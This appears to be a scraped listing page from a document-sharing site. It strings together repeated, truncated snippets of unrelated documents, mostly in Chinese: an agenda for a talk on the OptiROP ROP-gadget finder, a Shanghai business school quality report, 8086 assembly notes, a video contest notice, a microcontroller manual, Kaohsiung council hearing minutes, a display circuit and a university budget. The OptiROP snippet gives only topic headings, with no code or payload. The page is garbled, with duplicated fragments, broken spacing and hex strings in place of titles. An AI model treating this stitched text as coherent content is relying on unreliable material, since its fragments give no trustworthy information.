More information

OptiROP:

OptiROP: OptiROP: ROP gadgets 搜寻神 器 议程 Return-Oriented-Programming(ROP) gadget & shellcode OptiROP: 期望, 思路, 设计和实现 通过语义寻找 ROP gadgets 语义 gadgets 现场演示 总结 攻击 & 防御 软件攻击 使用软件 / 设计的缺陷来利用系统 / 应用软件 通过恶意输入来触发漏洞使得攻击代码得以执行

More information

编 辑 说 明 本 报 告 依 据 上 海 市 教 育 委 员 会 关 于 继 续 做 好 上 海 高 校 本 科 教 学 质 量 年 度 报 告 发 布 工 作 的 通 知 ( 沪 教 委 高 [2013]21 号 ) 文 件 精 神, 经 上 海 商 学 院 校 长 办 公 会 研 究 部 署,

编 辑 说 明 本 报 告 依 据 上 海 市 教 育 委 员 会 关 于 继 续 做 好 上 海 高 校 本 科 教 学 质 量 年 度 报 告 发 布 工 作 的 通 知 ( 沪 教 委 高 [2013]21 号 ) 文 件 精 神, 经 上 海 商 学 院 校 长 办 公 会 研 究 部 署, 上 海 商 学 院 2012 年 教 学 质 量 报 告 二 〇 一 三 年 九 月 编 辑 说 明 本 报 告 依 据 上 海 市 教 育 委 员 会 关 于 继 续 做 好 上 海 高 校 本 科 教 学 质 量 年 度 报 告 发 布 工 作 的 通 知 ( 沪 教 委 高 [2013]21 号 ) 文 件 精 神, 经 上 海 商 学 院 校 长 办 公 会 研 究 部 署, 上 海 商 学

More information

Microsoft PowerPoint - C15_LECTURE_NOTE_06

Microsoft PowerPoint - C15_LECTURE_NOTE_06 8088/8086 MICROPROCESSOR PROGRAMMING CONTROL FLOW INSTRUCTIONS AND PROGRAM STRUCTURES 8088/8086 MICROPROCESSOR PROGRAMMING CONTROL FLOW INSTRUCTIONS AND PROGRAM STRUCTURES 61 Flag-Control 62 Compare 63

More information

( 二 ) 內 容 形 式 : 微 電 影 動 畫 劇 情 片 創 意 短 片 廣 告 等 均 可 ( 三 ) 影 像 素 材 : 自 行 拍 攝 或 繪 製, 形 式 不 拘 ( 四 ) 攝 製 媒 材 不 限, 惟 報 名 時 應 繳 交 DVD 格 式 拷 貝 及 MPG MOV 檔 案 拷

( 二 ) 內 容 形 式 : 微 電 影 動 畫 劇 情 片 創 意 短 片 廣 告 等 均 可 ( 三 ) 影 像 素 材 : 自 行 拍 攝 或 繪 製, 形 式 不 拘 ( 四 ) 攝 製 媒 材 不 限, 惟 報 名 時 應 繳 交 DVD 格 式 拷 貝 及 MPG MOV 檔 案 拷 2016 新 北 市 政 府 新 聞 局 我 的 青 攝 時 代 新 北 市 青 年 政 策 校 園 影 片 徵 件 活 動 徵 件 辦 法 一 主 旨 鼓 勵 青 年 發 揮 創 意 運 用 新 媒 體 及 影 像 創 作 能 力 拍 攝 政 策 短 片, 以 趣 味 方 式 激 發 青 年 關 心 社 會 議 題 積 極 參 與 公 眾 事 務 之 公 民 意 識 二 主 辦 單 位 : 新 北

More information

1-1 SH79F6431 A. 2( ) 9~15V ( 12V) U2 U3 3.3V SH79F B. 1(VCC/GND) SH79F6431 C. VDDIO SH79F6431 P4 P5 P0.6 P0.7 VDDIO VDDIO=5V D. 2 V 1.0

1-1 SH79F6431 A. 2( ) 9~15V ( 12V) U2 U3 3.3V SH79F B. 1(VCC/GND) SH79F6431 C. VDDIO SH79F6431 P4 P5 P0.6 P0.7 VDDIO VDDIO=5V D. 2 V 1.0 SH79F6431 1. SH79F6431 1T 8051 FLASH SH79F JET51 Keil µ vision JTAG 1.1. SH79F6431 LQFP64 1.2. (Target Board) SH79F6431 1 V 1.0 1-1 SH79F6431 A. 2( ) 9~15V ( 12V) U2 U3 3.3V SH79F6431 1 2 1 B. 1(VCC/GND)

More information

高 雄 市 議 會 公 報 4 卷 記 錄 : 李 專 員 侑 珍 核 稿 : 江 專 門 委 員 聖 虔 一 主 持 人 李 議 員 雅 靜 宣 布 公 聽 會 開 始, 介 紹 與 會 來 賓 並 說 明 公 聽 會 要 旨 二 相 關 單 位 說 明 ( 一 ) 高 雄 市 政 府 衛 生 局

高 雄 市 議 會 公 報 4 卷 記 錄 : 李 專 員 侑 珍 核 稿 : 江 專 門 委 員 聖 虔 一 主 持 人 李 議 員 雅 靜 宣 布 公 聽 會 開 始, 介 紹 與 會 來 賓 並 說 明 公 聽 會 要 旨 二 相 關 單 位 說 明 ( 一 ) 高 雄 市 政 府 衛 生 局 4卷 污名 事實 檢視暨改革血汗醫院 公聽會會議紀錄 日 中 華民 國 101 年 月 25 日 星 一 下 午 2 時 地 點 本 會 1 樓 一 會議 室 出 ( 列 ) 席 民 意 代 表 議 員 李 雅靜 政 府 官 員 行 政 院 衛生 署 中 央 健康 保 險 局 高屏 業 務 組 專員 王 秀 蕙 行 政 院 衛生 署 中 央 健康 保 險 局 高屏 業 務 組 科員 張 瑞 卿 高

More information

<4D F736F F D20B3E6B4B9A4F930365F32A443AC71C5E3A5DCBEB9B1B1A8EE2E646F63>

<4D F736F F D20B3E6B4B9A4F930365F32A443AC71C5E3A5DCBEB9B1B1A8EE2E646F63> 七段顯示器控制電路四位數 _ 使用解碼器驅動 +5 V 10 uf 8.2 k 12 MHz 20 pf 1 2 3 4 5 6 7 8 9 P1.0 P1.1 P1.2 P1.3 P1.4 P1.5 P1.6 P1.7 RESET 10 P3.0 11 12 13 14 15 16 17 18 19 20 P3.1 P3.2 P3.3 P3.4 P3.5 P3.6 P3.7 XTAL2 XTAL1

More information

untitled

untitled 217 ...16...20...20...22...23...24...26...26...26...27...28...29...29...29...30...31...33...34...35...35...36...38...38...38...38...39...39...39...40...40...41...42...42...43...43...57...59 ...59...59...60...61...61...61...64...64...73...74...79...80...80...82...86...87...87...87...87...87...88...88...88...91...92...92...94...95...97...97...98...98...99...102...105...106...106...107...

More information

目 录 一 学 校 概 况... 3 ( 一 ) 学 校 基 本 情 况... 3 ( 二 ) 部 门 决 算 单 位 构 成... 7 二 2015 年 部 门 决 算 报 表...7 表 1: 高 等 学 校 收 支 决 算 总 表... 8 表 2: 高 等 学 校 收 入 决 算 表...

目 录 一 学 校 概 况... 3 ( 一 ) 学 校 基 本 情 况... 3 ( 二 ) 部 门 决 算 单 位 构 成... 7 二 2015 年 部 门 决 算 报 表...7 表 1: 高 等 学 校 收 支 决 算 总 表... 8 表 2: 高 等 学 校 收 入 决 算 表... 华 南 理 工 大 学 2015 年 部 门 决 算 2016 年 8 月 目 录 一 学 校 概 况... 3 ( 一 ) 学 校 基 本 情 况... 3 ( 二 ) 部 门 决 算 单 位 构 成... 7 二 2015 年 部 门 决 算 报 表...7 表 1: 高 等 学 校 收 支 决 算 总 表... 8 表 2: 高 等 学 校 收 入 决 算 表... 10 表 3: 高 等 学

More information